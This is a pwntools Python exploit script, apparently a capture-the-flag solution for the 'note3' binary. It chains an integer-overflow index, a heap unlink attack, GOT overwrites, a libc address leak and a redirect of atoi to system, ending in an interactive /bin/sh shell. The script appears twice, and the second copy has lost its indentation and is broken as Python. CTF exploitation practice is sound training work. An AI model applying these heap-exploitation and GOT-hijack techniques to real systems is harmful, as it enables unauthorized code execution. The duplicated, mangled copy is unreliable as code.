zctf-note3.py

## zctf-note3.py
#!/usr/bin/env python
# coding=utf8

from pwn import p64, u64, process, ELF

elf = ELF('/lib64/libc.so.6')
# elf = ELF('./libc-2.19.so')
p = process('./note3')

free_got = 0x602018
atoi_got = 0x602070
puts_plt = 0x400730
system_offset_to_atoi = elf.symbols['system'] - elf.symbols['atoi']


def add_note(size, content):
    p.sendline('1')
    p.sendline(str(size))
    p.sendline(content)


def edit_note(index, content):
    p.sendline('3')
    p.sendline(str(index))
    p.sendline(content)


def delete_note(index):
    p.sendline('4')
    p.sendline(str(index))


if __name__ == '__main__':
    for _ in range(7):
        # add note0 ... note6
        add_note(0x80, '')

    # make note3 active
    edit_note(3, '')

    note3_ptr = 0x6020c8 + 3 * 8

    # prepare fake previous chunk and overflow to note4 chunk
    payload = p64(0)  # size
    payload += p64(0x80 + 1)  # prev_size
    payload += p64(note3_ptr - 3 * 8)  # FD  (note3_ptr - 3*8 = note0_ptr)
    payload += p64(note3_ptr - 2 * 8)  # BK
    payload += 'A' * (0x80 - 4*8)  # junk
    payload += p64(0x80)  # note4_chunk_pre_size
    payload += p64(0x80 + 2 * 8)  # note4_chunk_size

    # integer overflow
    edit_note(-0x8000000000000000, payload)

    # delete note4 and unlink fake chunk
    delete_note(4)
    # now note3_ptr = note0_ptr

    # modify note0_ptr to free_got and note1_ptr, note2_ptr to atoi_got
    edit_note(3, p64(free_got) + p64(atoi_got) + p64(atoi_got)[:-1])
    edit_note(0, p64(puts_plt)[:-1])

    p.clean()
    delete_note(1)  # leak atoi
    p.recvuntil('Input the id of the note:\n')

    atoi_addr = u64(p.recv(6).ljust(8, '\x00'))
    system_addr = atoi_addr + system_offset_to_atoi
    print '[*] system_addr: 0x%x' % system_addr

    # modify note2_ptr(atoi_got) to system_addr
    edit_note(2, p64(system_addr)[:-1])

    # trigger atoi(now system)
    p.sendline('/bin/sh')

    p.clean()
    p.interactive()
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p64, u64, process, ELF

	elf = ELF('/lib64/libc.so.6')
	# elf = ELF('./libc-2.19.so')
	p = process('./note3')

	free_got = 0x602018
	atoi_got = 0x602070
	puts_plt = 0x400730
	system_offset_to_atoi = elf.symbols['system'] - elf.symbols['atoi']


	def add_note(size, content):
	p.sendline('1')
	p.sendline(str(size))
	p.sendline(content)


	def edit_note(index, content):
	p.sendline('3')
	p.sendline(str(index))
	p.sendline(content)


	def delete_note(index):
	p.sendline('4')
	p.sendline(str(index))


	if __name__ == '__main__':
	for _ in range(7):
	# add note0 ... note6
	add_note(0x80, '')

	# make note3 active
	edit_note(3, '')

	note3_ptr = 0x6020c8 + 3 * 8

	# prepare fake previous chunk and overflow to note4 chunk
	payload = p64(0) # size
	payload += p64(0x80 + 1) # prev_size
	payload += p64(note3_ptr - 3 * 8) # FD (note3_ptr - 3*8 = note0_ptr)
	payload += p64(note3_ptr - 2 * 8) # BK
	payload += 'A' * (0x80 - 4*8) # junk
	payload += p64(0x80) # note4_chunk_pre_size
	payload += p64(0x80 + 2 * 8) # note4_chunk_size

	# integer overflow
	edit_note(-0x8000000000000000, payload)

	# delete note4 and unlink fake chunk
	delete_note(4)
	# now note3_ptr = note0_ptr

	# modify note0_ptr to free_got and note1_ptr, note2_ptr to atoi_got
	edit_note(3, p64(free_got) + p64(atoi_got) + p64(atoi_got)[:-1])
	edit_note(0, p64(puts_plt)[:-1])

	p.clean()
	delete_note(1) # leak atoi
	p.recvuntil('Input the id of the note:\n')

	atoi_addr = u64(p.recv(6).ljust(8, '\x00'))
	system_addr = atoi_addr + system_offset_to_atoi
	print '[*] system_addr: 0x%x' % system_addr

	# modify note2_ptr(atoi_got) to system_addr
	edit_note(2, p64(system_addr)[:-1])

	# trigger atoi(now system)
	p.sendline('/bin/sh')

	p.clean()
	p.interactive()